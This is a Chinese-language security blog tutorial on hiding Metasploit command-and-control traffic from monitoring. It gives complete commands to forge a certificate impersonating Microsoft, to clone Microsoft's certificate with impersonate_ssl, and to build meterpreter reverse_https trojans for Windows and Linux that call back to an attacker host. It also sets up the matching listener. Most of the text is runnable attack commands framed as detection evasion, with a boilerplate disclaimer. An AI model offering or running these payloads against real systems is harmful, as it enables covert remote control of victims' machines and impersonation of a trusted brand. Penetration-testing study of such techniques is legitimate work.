免责声明
道一安全(本公众号)的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
前言
为什么要使用流量加密技术,在渗透测试中,安全工具和网络监控系统可能会检测到异常的网络流量模式或明文传输的敏感数据。通过加密流量,可以规避这些检测机制,使渗透测试过程更具隐蔽性。现实中的攻击者通常会使用加密技术来隐藏其活动,例如使用SSL / TLS加密HTTPS流量。
流量加密
OpenSSL 是一个开源的软件库,提供了一系列的加密和解密算法,以及一些常见的安全协议的实现。
OpenSSL主要包括三个组件:
密码库(Crypto Library):这是 OpenSSL 最核心的组件之一。它提供了各种加密算法、哈希函数和其他密码学工具,用于数据加密、解密、签名和验证等操作。
SSL/TLS 协议实现(SSL/TLS Protocol Implementation):SSL/TLS 是用于保护网络通信的协议,用于在客户端和服务器之间建立安全连接。
命令行工具(Command-Line Tools):OpenSSL 还提供了一些命令行工具,用于执行各种密码学操作、证书管理等任务。其中一些常用的命令行工具包括 openssl、openssl-genrsa、openssl-x509 等,它们可以用来生成密钥对、证书请求、自签名证书等。
使用 OpenSSL 创建 SSL/TLS 证书
openssl req -new -newkey rsa:4096 -days 365 -nodes -x509
-subj "/C=US/ST=Washington/L=Redmond/O=Microsoft/CN=www.microsoft.com"
-keyout www.microsoft.com.key
-out www.microsoft.com.crt &&
cat www.microsoft.com.key www.microsoft.com.crt > www.microsoft.com.pem &&
rm -f www.microsoft.com.key www.microsoft.com.crt
使用Metasploit框架impersonate_ssl模块,生成证书
use auxiliary/gather/impersonate_ssl
set RHOSTS www.microsoft.com
run
得到证书:
/home/ubuntu/.msf4/loot/20240322094946_default_122.224.45.160_122.224.45.160_p_777580.pem
使用msfvenom 生成带证书的马
Windows:
msfvenom -p windows/meterpreter/reverse_https LHOST=ip LPORT=4444 PayloadUUIDTracking=true HandlerSSLCert= www.microsoft.com.pem StagerVerifySSLCert=true -f exe -o shell.exe
Linux:
msfvenom -p linux/x86/meterpreter_reverse_https LHOST=ip LPORT=9443 PayloadUUIDTracking=true HandlerSSLCert=www.microsoft.com.pem StagerVerifySSLCert=true -f elf > shell.elf
参数解释:
HandlerSSLCert:向处理程序通知所使用的PEM证书。
StagerVerifySSLCert:当收到一个连接时执行SSL证书验证。
设置监听
以linux进行举例
use exploit/multi/handler
set payload linux/x86/meterpreter_reverse_https
set lhost ip
set lport 9443
set HandlerSSLCert /home/ubuntu/msf/www.microsoft.com.pem
set StagerVerifySSLCert true
set exitonsession false
run
原文始发于微信公众号(道一安全):超详细Metasploit流量加密实战教程
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论